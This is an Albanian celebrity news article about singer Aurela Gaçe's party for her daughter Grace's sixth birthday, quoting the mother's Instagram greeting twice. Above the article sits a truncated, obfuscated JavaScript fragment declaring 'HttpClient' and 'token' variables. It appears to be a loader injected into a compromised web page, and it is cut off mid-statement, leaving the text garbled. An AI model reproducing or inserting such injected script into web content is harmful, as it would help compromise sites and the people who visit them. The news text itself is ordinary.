;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Vajza e Aurela Gaçes pushton internetin: Festë e paparë për ditëlindje, edhe më i bukur urimi i nënës!

By

Para një dite, kishte arsye për të qenë shumë të gëzuar sot Aurela Gace me gjithë familjen e saj.

Dje gjashtë vjet më parë, këngëtarja kishte mbajtur për të parën herë në duar vogëlushen e saj me emrin Grace.

E tani që Grace është gjashtë vjeçe, Aurela s’mund të ishte nënë më krenare për të bijën e saj. Përmes një feste madhështore, të tillë çfarë çdo fëmijë do e ëndërronte për ditëlindje, Aurela e festoi këtë ditë të rëndësishme për të.

Festa po që ishte e bukur, por urimi i Aurelës për të bijën nuk ka të krahasuar. Me fjalë të bukura, ajo të bijës i ka uruar të ketë gjënë më të bukur në jetë, dashurinë e miqve të saj.

“6 vjet me pare , te mbajta ne krahë për here te pare…bekimi me I madh I jetës time. GRACE #HIRI I PERENDISE .

“Dje, ishin mbledhur shoket e tu te grupit me te cilet kalove 3 vjet ne kopesht e para-shkollor bashke me mesuesen tuaj . Shume nga ata shkuan ne klasen e pare e ty tani t’u shtuan edhe shoke te rinj e do te rriteni bashke. Dje, shoket te sollen shume dhurata…por kur te rritesh , do te shohesh keto foto, kete dashuri te sinqerte , kete gezim qe ke ti e shoket e shoqet e tua, dhe atehere do t’a kuptosh se pse mami te uron, te rrethohesh gjithe jeten tende me dashuri te sinqerte , pikerisht si ne keto foto. Ju falenderoj shume prinder te shokeve te Grace qe moret kohen tuaj e bete te mundur qe ajo te festonte e rrethuar nga dashuria e sinqerte e femijeve. Keto sy te qeshur pafshim gjithe jeten tek femijet tane”, është urimi i këngëtares.

E pas kësaj, një mori fotografish nga atmosfera e festës, kanë shpërthyer në profilin e Aurelës, që po vlonte nga lumturia. /Prive.al

6 vjet me pare , te mbajta ne krahe per here te pare…bekimi me I madh I jetes time. GRACE #HIRI I PERENDISE . Dje, ishin mbledhur shoket e tu te grupit me te cilet kalove 3 vjet ne kopesht e para-shkollor bashke me mesuesen tuaj . Shume nga ata shkuan ne klasen e pare e ty tani t’u shtuan edhe shoke te rinj e do te rriteni bashke. Dje, shoket te sollen shume dhurata…por kur te rritesh , do te shohesh keto foto, kete dashuri te sinqerte , kete gezim qe ke ti e shoket e shoqet e tua, dhe atehere do t’a kuptosh se pse mami te uron, te rrethohesh gjithe jeten tende me dashuri te sinqerte , pikerisht si ne keto foto. Ju falenderoj shume prinder te shokeve te Grace qe moret kohen tuaj e bete te mundur qe ajo te festonte e rrethuar nga dashuria e sinqerte e femijeve ????? . .Keto sy te qeshur pafshim gjithe jeten tek femijet tane @bambi_event

A post shared by email: [email protected] (@aurelagaceofficial) on

Artikuj të ngjashëm